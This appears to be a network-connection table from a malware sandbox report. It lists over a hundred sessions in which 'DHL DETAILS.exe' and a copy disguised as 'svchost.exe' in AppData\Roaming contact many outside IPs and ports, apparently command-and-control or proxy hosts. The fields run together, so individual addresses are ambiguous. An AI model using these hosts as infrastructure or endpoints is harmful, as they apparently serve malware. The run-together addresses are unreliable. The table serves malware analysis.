                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7755192.168.2.554210213.184.153.6680806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7756192.168.2.55603174.119.144.60414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7757192.168.2.55297545.231.133.51806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7758192.168.2.561051172.67.182.908043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7759192.168.2.561416167.99.124.1188043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7760192.168.2.564939140.238.25.2552100056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7761192.168.2.560994185.212.60.628043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7762192.168.2.56102665.109.152.88888843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7763192.168.2.563613104.20.75.698056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7764192.168.2.564447172.67.127.1888056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7765192.168.2.565398199.58.184.97414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7766192.168.2.56218364.137.93.62651956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7767192.168.2.550372178.128.157.1144436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7768192.168.2.564852138.2.73.157108043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7769192.168.2.55039743.153.172.764436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7770192.168.2.55890843.153.172.7644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7771192.168.2.55890943.153.172.7644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7772192.168.2.563164185.101.16.528056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7773192.168.2.55891443.153.172.7644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7774192.168.2.56080045.196.151.59543243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7775192.168.2.560814100.1.53.24567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7776192.168.2.563765103.118.46.177808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7777192.168.2.556035104.18.44.938043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7778192.168.2.556041172.67.181.1038043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7779192.168.2.560888161.97.74.1763000043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7780192.168.2.560873139.224.64.191808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7781192.168.2.56144694.131.14.66108143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7782192.168.2.55431264.227.108.25319086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7783192.168.2.565127103.163.244.388256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7784192.168.2.560825103.132.92.110108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7785192.168.2.551303104.16.72.45806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7786192.168.2.55604091.189.177.188312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7787192.168.2.55038251.15.139.59163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7788192.168.2.55124172.206.181.97649436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7789192.168.2.565477185.250.27.54312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7790192.168.2.563761192.252.208.701428256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7791192.168.2.551338123.57.246.16381186352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7792192.168.2.558895211.93.2.190730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7793192.168.2.56200951.158.119.711637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7794192.168.2.56524139.165.0.137900243080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7795192.168.2.551306222.138.76.690026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7796192.168.2.549271104.200.135.46414543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7797192.168.2.563791162.159.242.2528056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7798192.168.2.565402201.13.147.161567843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7799192.168.2.563813172.67.150.1738056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7800192.168.2.56271384.47.145.189808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7801192.168.2.56543347.243.92.199312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7802192.168.2.565308199.102.106.94414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7803192.168.2.55867797.74.233.2064059143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7804192.168.2.565443185.101.16.528043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7805192.168.2.558900117.160.250.132889943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7806192.168.2.56237698.188.47.132414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7807192.168.2.56377060.205.132.718056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7808192.168.2.557941102.69.177.2421008143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7809192.168.2.557404159.223.71.716051243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7810192.168.2.563811147.75.34.868056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7811192.168.2.56377143.255.113.2328556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7812192.168.2.563778178.128.113.1182312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7813192.168.2.563816139.224.64.191808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7814192.168.2.551273172.67.182.126806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7815192.168.2.558423104.248.151.2205317743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7816192.168.2.563355103.164.214.122808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7817192.168.2.55124538.162.3.7431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7818192.168.2.563551201.71.2.4199956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7819192.168.2.558578162.241.66.1353682943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7820192.168.2.563803103.66.177.173225156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7821192.168.2.558872107.180.90.882030943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7822192.168.2.556684103.242.119.8880
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7823192.168.2.559194171.244.140.1605374943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7824192.168.2.5512591.15.62.1256786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7825192.168.2.5637643.123.150.192312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7826192.168.2.562921200.6.175.105934156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7827192.168.2.560815189.240.60.168909043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7828192.168.2.563762103.132.92.110108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7829192.168.2.55037868.169.59.17183806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7830192.168.2.55130352.172.1.186806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7831192.168.2.56363451.79.87.1444174656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7832192.168.2.562904103.109.59.209108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7833192.168.2.565360104.27.83.1838056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7834192.168.2.565365104.21.64.2088056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7835192.168.2.559647203.96.177.2111590143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7836192.168.2.56534891.189.177.186312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7837192.168.2.565353120.26.0.11888043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7838192.168.2.562446111.53.178.249730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7839192.168.2.56407066.228.33.1904480956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7840192.168.2.563888209.126.104.381245756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7841192.168.2.563577201.13.147.161567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7842192.168.2.56423645.11.95.166600443080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7843192.168.2.56381046.253.143.144108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7844192.168.2.56104645.81.232.175328843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7845192.168.2.560761144.24.77.905555543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7846192.168.2.563795139.162.238.1842224356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7847192.168.2.563791185.101.16.528056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7848192.168.2.561146185.196.182.22808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7849192.168.2.560012194.85.135.243414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7850192.168.2.5609971.15.62.12567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7851192.168.2.560996103.66.177.173225143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7852192.168.2.563217201.13.147.161567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7853192.168.2.56036288.79.243.103312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7854192.168.2.564795211.93.2.190730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7855192.168.2.55028850.63.12.33309206352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7856192.168.2.549272103.118.46.177808043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7857192.168.2.55541672.217.216.239414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7858192.168.2.55131772.195.34.35273606352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7859192.168.2.55740151.89.173.402788743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7860192.168.2.563027201.71.2.10399956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7861192.168.2.555498201.13.147.161567843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7862192.168.2.555465103.66.177.173225143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7863192.168.2.565308111.53.178.249730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7864192.168.2.563817184.178.172.11414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7865192.168.2.56208451.91.109.838056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7866192.168.2.561221148.66.130.532087043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7867192.168.2.56086251.158.108.1341637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7868192.168.2.564663192.64.115.904710056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7869192.168.2.565398100.1.53.24567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7870192.168.2.559201103.132.92.110108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7871192.168.2.56129245.11.95.166600843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7872192.168.2.56136647.89.184.18312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7873192.168.2.555544103.66.177.173225143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7874192.168.2.56503546.226.148.1053636643080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7875192.168.2.564922162.241.50.1795375556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7876192.168.2.551338217.182.153.29120006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7877192.168.2.56529294.23.220.1361954756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7878192.168.2.55552972.217.216.239414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7879192.168.2.555598193.151.130.114808643220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7880192.168.2.565321133.232.90.1558056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7881192.168.2.56182945.11.95.165501956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7882192.168.2.555661185.196.182.22808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7883192.168.2.55578994.131.14.66108143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7884192.168.2.549208162.223.89.848056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7885192.168.2.55553472.195.34.352736043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7886192.168.2.56291716.162.211.90108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7887192.168.2.563012185.51.92.1085132756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7888192.168.2.562875183.80.130.9414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7889192.168.2.55561350.63.12.331473843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7890192.168.2.56368745.173.12.141199456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7891192.168.2.56400245.11.95.165501856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7892192.168.2.549276132.148.128.882660656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7893192.168.2.549284197.248.86.2373265056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7894192.168.2.55549988.79.243.103312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


